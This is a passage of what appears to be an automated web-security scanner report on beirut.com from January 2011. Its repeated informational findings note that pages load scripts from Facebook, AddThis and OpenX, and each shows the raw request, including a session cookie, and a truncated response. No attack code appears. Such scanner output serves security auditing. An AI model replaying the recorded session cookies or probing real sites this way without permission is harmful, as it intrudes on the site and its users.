<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.679. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:44:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.680. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:29:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.681. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:34:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.682. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.683. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:32:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.684. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:20:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.685. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:23:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.686. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:29:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.687. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:42:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.688. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:31:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.689. http://www.beirut.com/Shopping/Shopping-Centers/492064852 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Shopping-Centers/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.690. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Shopping-Centers/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:51:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
